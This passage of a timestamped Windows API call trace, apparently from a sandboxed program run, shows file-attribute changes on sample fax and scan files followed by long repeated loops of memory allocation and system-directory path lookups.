NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif", dwFileAttributes=0x80) returned 0 [0156.894] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.894] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.895] CoTaskMemFree (pv=0x508980) [0156.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.898] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0156.899] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", lpFilePart=0x0) returned 0x3e [0156.941] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", dwFileAttributes=0x80) returned 0 [0156.944] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.944] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.945] CoTaskMemFree (pv=0x508980) [0156.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.945] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.945] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.946] CoTaskMemFree (pv=0x508980) [0156.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.946] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.946] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.946] CoTaskMemFree (pv=0x508980) [0156.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.951] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.951] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.951] CoTaskMemFree (pv=0x508980) [0156.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.952] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.952] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.952] CoTaskMemFree (pv=0x508980) [0156.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.953] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.953] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.953] CoTaskMemFree (pv=0x508980) [0156.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.954] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.954] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.954] CoTaskMemFree (pv=0x508980) [0156.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.957] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.957] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.958] CoTaskMemFree (pv=0x508980) [0156.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.959] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.959] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.959] CoTaskMemFree (pv=0x508980) [0156.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.960] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.960] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.960] CoTaskMemFree (pv=0x508980) [0156.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.961] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.961] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.961] CoTaskMemFree (pv=0x508980) [0156.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.962] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.962] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.962] CoTaskMemFree (pv=0x508980) [0156.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.963] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.963] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.963] CoTaskMemFree (pv=0x508980) [0156.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.963] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.963] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.964] CoTaskMemFree (pv=0x508980) [0156.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.964] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.964] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.965] CoTaskMemFree (pv=0x508980) [0156.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.965] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.965] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.966] CoTaskMemFree (pv=0x508980) [0156.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.966] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.966] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.966] CoTaskMemFree (pv=0x508980) [0156.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.967] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.967] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.967] CoTaskMemFree (pv=0x508980) [0156.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.968] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.968] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.968] CoTaskMemFree (pv=0x508980) [0156.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.969] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.969] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.969] CoTaskMemFree (pv=0x508980) [0156.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.974] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.974] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.974] CoTaskMemFree (pv=0x508980) [0156.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.975] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.975] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.975] CoTaskMemFree (pv=0x508980) [0156.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.976] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.976] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.976] CoTaskMemFree (pv=0x508980) [0156.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.977] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.977] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.977] CoTaskMemFree (pv=0x508980) [0156.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.977] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.977] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.978] CoTaskMemFree (pv=0x508980) [0156.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.978] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.978] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.979] CoTaskMemFree (pv=0x508980) [0156.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.979] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.979] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.980] CoTaskMemFree (pv=0x508980) [0156.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.980] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.980] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.980] CoTaskMemFree (pv=0x508980) [0156.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.981] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.981] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.981] CoTaskMemFree (pv=0x508980) [0156.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.982] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.982] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.982] CoTaskMemFree (pv=0x508980) [0156.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.983] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.983] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.983] CoTaskMemFree (pv=0x508980) [0156.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.984] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.984] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.984] CoTaskMemFree (pv=0x508980) [0156.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.985] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.985] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.985] CoTaskMemFree (pv=0x508980) [0156.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.994] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.994] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.995] CoTaskMemFree (pv=0x508980) [0156.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.995] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.995] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.996] CoTaskMemFree (pv=0x508980) [0156.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.997] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.997] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.997] CoTaskMemFree (pv=0x508980) [0156.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.998] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.998] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.998] CoTaskMemFree (pv=0x508980) [0156.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.999] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.999] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.999] CoTaskMemFree (pv=0x508980) [0156.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.000] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.000] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.000] CoTaskMemFree (pv=0x508980) [0157.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.001] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.001] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.001] CoTaskMemFree (pv=0x508980) [0157.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.002] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.002] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.002] CoTaskMemFree (pv=0x508980) [0157.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.003] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.003] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.003] CoTaskMemFree (pv=0x508980) [0157.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.004] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.004] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.004] CoTaskMemFree (pv=0x508980) [0157.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.005] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.005] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.005] CoTaskMemFree (pv=0x508980) [0157.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.006] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.006] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.006] CoTaskMemFree (pv=0x508980) [0157.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.007] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.007] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.008] CoTaskMemFree (pv=0x508980) [0157.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.008] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.008] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.009] CoTaskMemFree (pv=0x508980) [0157.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.009] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.009] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.010] CoTaskMemFree (pv=0x508980) [0157.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.010] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.010] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.011] CoTaskMemFree (pv=0x508980) [0157.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.011] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.011] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.012] CoTaskMemFree (pv=0x508980) [0157.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.012] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.012] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.013] CoTaskMemFree (pv=0x508980) [0157.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.013] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.013] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.014] CoTaskMemFree (pv=0x508980) [0157.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.014] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.014] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.015] CoTaskMemFree (pv=0x508980) [0157.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.015] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.016] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.016] CoTaskMemFree (pv=0x508980) [0157.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.017] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.017] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.017] CoTaskMemFree (pv=0x508980) [0157.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.020] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.020] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.021] CoTaskMemFree (pv=0x508980) [0157.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.021] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.021] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.022] CoTaskMemFree (pv=0x508980) [0157.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.022] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.022] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.023] CoTaskMemFree (pv=0x508980) [0157.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.025] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.025] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.025] CoTaskMemFree (pv=0x508980) [0157.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.026] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.026] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.026] CoTaskMemFree (pv=0x508980) [0157.026] 